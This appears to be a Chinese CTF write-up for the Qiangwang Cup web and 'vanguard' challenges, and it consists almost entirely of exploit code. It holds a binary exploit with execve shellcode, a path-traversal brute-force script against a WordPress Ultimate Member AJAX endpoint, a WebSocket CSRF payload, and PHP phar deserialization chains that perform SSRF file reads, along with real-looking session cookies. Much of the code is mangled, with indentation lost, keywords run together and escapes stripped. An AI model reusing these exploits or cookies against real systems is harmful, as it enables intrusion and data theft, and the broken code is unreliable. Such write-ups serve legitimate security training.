-
rcefile
-
polydiv
# sh.recvuntil("XXXX+")
# suffix = sh.recvuntil(')').decode("utf8")[:-1]
# log.success(suffix)
# sh.recvuntil("== ")
# cipher = sh.recvline().strip().decode("utf8")
# sh.sendlineafter("Give me XXXX: ", proof)
from Crypto.Util.number import *
from hashlib import *
from pwn import *
sh=remote()
sh.recvuntil("XXXX+")
suffix = sh.recvuntil(')').decode("utf8")[:-1]
log.success(suffix)
sh.recvuntil("== ")
table = string.ascii_letters + string.digits
cipher = sh.recvline().strip().decode("utf8")
for a in table:
for b in table:
for c in table:
for d in table:
x = a+b+c+d
if sha256((x + suffix).encode()).hexdigest() == cipher:
proof = x
log.success(proof)
sh.sendlineafter("Give me XXXX: ", proof)
R.<x>= Zmod(2)[]
for _ in range(40):
sh.recvuntil("r(x) = ")
rx = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
sh.recvuntil("a(x) = ")
ax = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
sh.recvuntil("c(x) = ")
cx = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
sh.recvuntil("b(x) = ")
sh.sendline(str((rx-cx)/ax))
sh.interactive()
-
ASR
# from secret import falg
# pad = lambda s:s + bytes([(len(s)-1)%16+1]*((len(s)-1)%16+1))
# n = getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2
# e = 3
# flag = pad(flag)
# print(flag)
# assert(len(flag) >= 48)
# m = int.from_bytes(flag,'big')
# c = pow(m,e,n)
# print(f'n = {n}')
# print(f'e = {e}')
# print(f'c = {c}')
# '''
from functools import reduce
n =8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
e =3
c =945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
P1 =223213222467584072959434495118689164399
P2 =218566259296037866647273372633238739089
P3 =260594583349478633632570848336184053653
P4 =225933944608558304529179430753170813347
assert n == (P1*P2*P3*P4)**2
phi = (P3-1)*(P1-1)*P3*P1
from Crypto.Util.number import *
print(GCD(e,phi))
d = inverse(e,phi)
from sympy import *
# m2 = nthroot_mod(c,3,P2,True)
# print(m2)
# m2 = nthroot_mod(c,3,P4,True)
# print(m2)
m =50285288042907373014089492494812223136212714158049271523227438161885132141972
m1s=[5366126490251257564421634982763999075, 54017009972585088360569997378772209006, 159183122833201520722281740271702531008]
m2s = [43972919603849682780990360817839460344, 84132055525449472521332928867042183796, 97828969479259149226856141068289169207]
def CRT(ai, mi):
assert (reduce(GCD,mi)==1)
assert (isinstance(mi, list) and isinstance(ai, list))
M = reduce(lambda x, y: x * y, mi)
ai_ti_Mi = [a * (M // m) * inverse(M // m, m) for (m, a) in zip(mi, ai)]
return reduce(lambda x, y: x + y, ai_ti_Mi) % M
for m1 in m1s:
for m2 in m2s:
try:
print(long_to_bytes(CRT([int(m1),int(m2),m],[int(P2),int(P4),int(P1*P3)])))
exceptException as e:
print(str(e))
-
WP-UM
Host: eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com
Cookie: wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
field_name=test&filepath=/../../../../../../../../username/1M&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=1d833af826&is_ajax=true
tables =r'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_{}-'
url ="http://eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
headers = {
'Cookie':'wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1'}
flag =""
for i in range(1,16):
for t in tables:
data={
'field_name':'test'
,'filepath':'/../../../../../../../../password/%s'%(str(i)+t)
,'field_id':'um_field_4'
,'form_key':'Upload'
,'action':'um_show_uploaded_file'
,'pf_nonce':'1d833af826'
,'is_ajax':'true'
}
print(str(i)+t)
r = requests.post(url,data=data,headers=headers)
if"Remove"in r.text:
flag = flag +t
print(flag)
break
-
devnull
context.log_level=True
io=process('./devnull')
#io=remote('182.92.161.17',16302)
#gdb.attach(io,'b *0x40145c')
#raw_input()
io.sendlineafter('filename','b'*0x1f)
payload='a'*0x14+p64(0x3fe100)+p64(0x3fe118)+p64(0x401350)
io.sendafter('discard',payload)
shellcode = "x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05"
payload=p64(0x3fe000)
payload+='a'*0x18+p64(0x4012D0)+'a'*8+p64(0x3fe138)
payload+=shellcode
io.sendafter('data',payload)
io.sendline("/bin/shx00")
io.recvuntil("n")
io.sendline("cat ./flag 1>&2")
io.interactive()
io.interactive()
-
babyweb
var url = "ws://" + window.location.host + "/bot";
function wsk(){
ws = new WebSocket("ws://127.0.0.1:8888/bot");
ws.onopen = function(event){
var msg = "changepw 123456";
ws.send(msg);
}
}
wsk();
</script>
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":0},{"id":2,"num":1}]
}
-
easyweb
</form>
<?php $upload=md5("2022qwb".$_SERVER['REMOTE_ADDR']);@mkdir($upload,0333,true);if(isset($_POST['submit'])) { include'upload.php'; } ?>
</form>
if(preg_match("/http|https|bzip2|gopher|dict|zlib|data|input|%00/i",$filename)){ die("nop");}else{ if(isset($_SESSION)){ $show=newAdminShow($filename);$show->show(); }else{ if(preg_match('/guest|demo/i',$filename)) { $show=newGuestShow($filename);$show->show(); }else{ die("<p class='tip'>no permission, you can only see string 'demo' and 'guest'</p>"); } }}?>
if(isset($_SESSION)){ if(isset($_GET['fname'])?!empty($_GET['fname']):FALSE){ $_FILES["file"]["name"] =$_GET['fname']; } $upload=newUpload();$upload->upload();}else { die("<p class='tip'>guest can not upload file</p>");}?>
classGuestShow{ public$file;public$contents;publicfunction __construct($file) {
$this->file=$file; } function __toString(){ $str=$this->file->name;return""; } function __get($value){ return$this->$value; } function show() { $this->contents =file_get_contents($this->file);$src="data:jpg;base64,".base64_encode($this->contents);echo"<img src={$src} />"; } function __destruct(){ echo$this; }}
classAdminShow{ public$source;public$str;public$filter;publicfunction __construct($file) { $this->source =$file;$this->schema ='file:///var/www/html/'; } publicfunction __toString() { $content=$this->str[0]->source;$content=$this->str[1]->schema;return$content; } publicfunction __get($value){ $this->show();return$this->$value; } publicfunction __set($key,$value){ $this->$key=$value; } publicfunction show(){ if(preg_match('/usr|auto|log/i',$this->source)) { die("error"); } $url=$this->schema .$this->source;$curl=curl_init();curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl,CURLOPT_HEADER,1);$response=curl_exec($curl);curl_close($curl);$src="data:jpg;base64,".base64_encode($response);echo"<img src={$src} />";
} publicfunction __wakeup() { if ($this->schema !=='file:///var/www/html/') { $this->schema ='file:///var/www/html/'; } if ($this->source !=='admin.png') { $this->source ='admin.png'; } }}
classAdminShow{ public$source;public$str;public$filter;publicfunction __construct($file) { $this->source =$file;$this->schema ='file://'; }}@unlink("test.phar");$phar=new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub$o=newGuestShow(newAdminShow("/proc/net/tcp"));$phar->setMetadata($o);//将自定义的meta-data存入manifest$phar->addFromString("test.txt","test");//添加要压缩的文件$phar->stopBuffering();
file = open("test.phar","rb").read()text = file[:-28] #读取开始到末尾除签名外内容last = file[-8:] #读取最后8位的GBMB和签名flagnew_file = text+sha1(text).digest() + last #生成新的文件内容,主要是此时Sha1正确了。open("demo7.jpg","wb").write(new_file)
//内网资源阅读器-测试机
//配置信息请看phpinfo.php
highlight_file(__FILE__);
if (isset($_GET['url'])){ $link=$_GET['url'];$curlobj=curl_init();curl_setopt($curlobj,CURLOPT_POST,0);curl_setopt($curlobj,CURLOPT_URL,$link);curl_setopt($curlobj,CURLOPT_RETURNTRANSFER,1);$result=curl_exec($curlobj);curl_close($curlobj);
echo$result;}
if($_SERVER['REMOTE_ADDR']==='10.10.10.101'||$_SERVER['REMOTE_ADDR']==='100.100.100.101'){ system('cat /flag');die();}
?>
$this->file=$file; }}
classAdminShow{ public$source;public$str;public$filter;publicfunction __construct($file) { $this->source =$file;$this->schema ='http://'; }}@unlink("test.phar");$phar=new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub$o=newGuestShow(newAdminShow("10.10.10.10:80/?url=file:///flag"));$phar->setMetadata($o);//将自定义的meta-data存入manifest$phar->addFromString("test.txt","test");//添加要压缩的文件$phar->stopBuffering();
-
crash
-
easylogin
原文始发于微信公众号(山石网科安全技术研究院):强网杯WriteUp|强网先锋 & Web
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论